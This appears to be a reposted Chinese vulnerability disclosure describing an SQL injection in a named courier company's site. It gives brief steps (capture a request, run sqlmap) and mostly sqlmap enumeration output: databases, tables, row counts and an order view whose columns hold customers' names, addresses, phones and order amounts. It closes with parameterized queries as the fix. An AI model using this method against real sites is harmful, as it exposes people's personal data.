速達快遞一處SQL注入(26萬訂單信息包括金額等詳情)
1.登錄到速達快遞,進入如下頁面后點擊-倉庫存儲
2
3,抓包
4.將代碼保存到文本中 用sqlmap跑起來
5.數據庫
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [7]:
[*] kuaidi0522
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
6.表
Database: kuaidi0522
[61 tables]
+---------------------+
| BalanceLog |
| CustomerJFLog |
| CustomerJFLog |
| DBKouAn |
| DP_BaoZhuang |
| DP_JJDZ |
| DP_relax |
| Daigou |
| DeliType |
| Downs |
| EpsPrint |
| JF_Goods |
| Job |
| OrderFormat |
| OrderFormat |
| OrderPackage |
| PackPrice |
| PackPrice |
| PackType |
| Pags |
| PayMode |
| PayType |
| Query |
| SendType |
| StateType |
| StoreCangKu |
| StoreClass |
| StoreInfo_Items |
| StoreInfo_Items |
| StoreItem |
| StoreLog |
| StoreOutInfo_Items |
| StoreOutInfo_Items |
| StorePrice |
| Store_ZYGS |
| UserIds |
| VirtualOrders |
| WebInfo |
| addressbook |
| adminLogin |
| bagInfo |
| city |
| kd_join |
| kd_know |
| kd_message |
| kd_news |
| kd_ps |
| kd_qa |
| kd_url |
| orderlog |
| siteLog |
| type1 |
| type2 |
| vBagsOrder |
| vJJRelax |
| vOrderList |
| vStoreInfo_Items |
| vStoreInfo_Items |
| vStoreOutInfo_Items |
| vStoreOutInfo_Items |
| vw_Customer |
+---------------------+
sqlmap resumed the following injection point(s) from stored session:
7.Database: kuaidi0522
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| dbo.orderlog | 1412665 |
| dbo.OrderPackage | 264665 |
| dbo.vOrderList | 264556 |
vOrderList 這個訂單視圖 里面有26萬的訂單
8.我們再看下表結構
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: kuaidi0522
Table: vOrderList
[47 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| Aweight | nvarchar |
| baozhuangID | int |
| CM | int |
| deliID | int |
| DIM | nvarchar |
| epsno | varchar |
| FTEdate | nvarchar |
| id | int |
| indat | datetime |
| isdel | int |
| ispay | int |
| orderid | nvarchar |
| orderprice | decimal |
| packages | nvarchar |
| packid | int |
| packtypeid | int |
| payerAccount | nvarchar |
| PayModeID | int |
| PayTypeID | int |
| recaddress | nvarchar |
| reccompany | nvarchar |
| reccountry | nvarchar |
| recdate | nvarchar |
| recer | nvarchar |
| recphone | nvarchar |
| recpostal | nvarchar |
| recsign | nvarchar |
| sendaddress | nvarchar |
| sendcompany | nvarchar |
| sendcountry | nvarchar |
| sender | nvarchar |
| sendphone | nvarchar |
| sendpostal | nvarchar |
| sendsign | nvarchar |
| sendtype | nvarchar |
| sentID | int |
| signdate | nvarchar |
| state | int |
| tax | nvarchar |
| totalValue | nvarchar |
| txt1111 | nvarchar |
| txt2222 | nvarchar |
| txt3333 | nvarchar |
| txt4444 | nvarchar |
| username | nvarchar |
| Vweight | nvarchar |
| zydh | nvarchar |
+--------------+----------+
這里的sender sendercompany 送件人 地址 公司 訂單金額 電話 以及收件人的公司地址電話都有
解決方案:
參數化查詢
就愛閱讀www.92to.com網友整理上傳,為您提供最全的知識大全,期待您的分享,轉載請注明出處。
歡迎轉載:http://www.kanwencang.com/bangong/20161102/33303.html
文章列表
留言列表
